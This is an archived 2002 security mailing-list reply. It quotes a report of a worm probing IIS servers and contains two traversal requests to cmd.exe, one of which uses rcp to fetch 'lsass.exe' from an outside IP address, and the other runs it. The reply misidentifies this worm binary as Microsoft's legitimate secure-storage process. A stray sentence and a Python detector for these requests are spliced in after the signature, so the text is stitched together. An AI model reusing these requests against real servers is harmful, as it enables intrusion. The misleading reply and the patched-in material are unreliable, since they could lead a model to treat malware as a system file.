Hello Christian,

On Sat, 21 Sep 2002, at 20:17:48 [GMT +0200] (which was 19:17 in my TimeZone) you wrote:

CM> hi,
CM> For about a week I have been noticing attempts to exploit vulnerable IIS installations
CM> (they show up with snort's "WEB-IIS multiple decode attempt" signature)
CM> that seem to try to load an "lsass.exe" file via rcp.
CM> As a search of google and securityfocus turned up nothing, I'll throw in
CM> what I gathered so far and ask if anybody can identify this: (it seems
CM> the affected customer's systems weren't vulnerable, so I don't know what
CM> the worm's further actions are).
CM>
CM> The first part is a SYN scan for port 80, with the source port set to 80,
CM> differing ACK numbers, but the same ISN. Interestingly, it iterates over
CM> the 3rd IP address octet first, and the 4th later, probably to make the scan
CM> on the single /24 slower and less noticeable (in the case I've seen, it
CM> has some 30 seconds between packets to consecutive addresses).
CM>
CM> Then it seems to go after the web servers, sending the following:
CM>
CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0
CM>
CM> and
CM>
CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
CM>
CM> I've been able to get hold of that lsass.exe binary (9728 bytes), but
CM> I lack the skills to analyze it; I'll happily mail it to anybody who asks.
CM>
CM> Yes, and the IP address doing the scanning + exploit attempts is different
CM> from the one which provides lsass.exe; the scanning machine seems to be
CM> a Solaris 2.7 default install, the rcp server seems to be Solaris 2.8.
CM>
CM> regards,
CM> cm.

lsass.exe is the Microsoft Secure Storage for 2000/NT and XP. It is responsible for managing secure storage in those environments.

-- 
Best regards,
Michael
http://wwww.thompsonmike.co.uk/
PGP KeyID := 0x3CC985FA

I just can't put it down.
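As an added example (not part of Christian's or Michael's message), the following Python checker shows the normalization a "multiple decode" rule needs for request lines like the two quoted above: it URL-decodes until the path stops changing, counts how many passes actually changed it, maps backslashes to slashes and then checks whether the path climbs out of its virtual directory or names cmd.exe. The four sample request lines are constructed for this example; two of them are the requests Christian quoted, the double-encoded one is an assumed variant used only to exercise the pass counter.

```python
from urllib.parse import unquote

# Constructed sample lines for this example: one benign request, the two
# requests quoted in the thread, and one double-encoded variant (assumed, not
# observed on the page) to exercise the multiple-decode check.
SAMPLE_REQUESTS = [
    "GET /scripts/report.asp?id=7 HTTP/1.0",
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0",
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0",
    "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0",
]


def normalize_path(raw_path, max_passes=3):
    """Decode until stable and map '\\' to '/'. Returns (path, passes), where
    passes counts decode rounds that changed the input; >1 means the request
    was encoded more than once, which is what the snort signature looks for."""
    current, passes = raw_path, 0
    for _ in range(max_passes):
        decoded = unquote(current)
        if decoded == current:
            break
        current, passes = decoded, passes + 1
    return current.replace("\\", "/"), passes


def escapes_virtual_dir(norm_path):
    """True if '..' segments climb above the first directory (/scripts)."""
    depth = 0
    for part in norm_path.split("/"):
        if part == "..":
            depth -= 1
            if depth < 1:      # left the virtual directory it started in
                return True
        elif part and part != ".":
            depth += 1
    return False


def analyze_request(log_line):
    """Classify one request line and return the evidence as a dict."""
    method, target, _version = log_line.split(" ", 2)
    path, _, _query = target.partition("?")
    norm, passes = normalize_path(path)
    traversal = escapes_virtual_dir(norm)
    cmd_exe = norm.lower().endswith("/cmd.exe")
    return {"method": method, "path": norm, "decode_passes": passes,
            "traversal": traversal, "cmd_exe": cmd_exe,
            "suspicious": traversal or cmd_exe or passes > 1}


def flagged_indices(lines):
    """Indices of the lines analyze_request() marks suspicious."""
    return [i for i, line in enumerate(lines) if analyze_request(line)["suspicious"]]
```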
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Sep 23 2002 - 10:03:57 PDT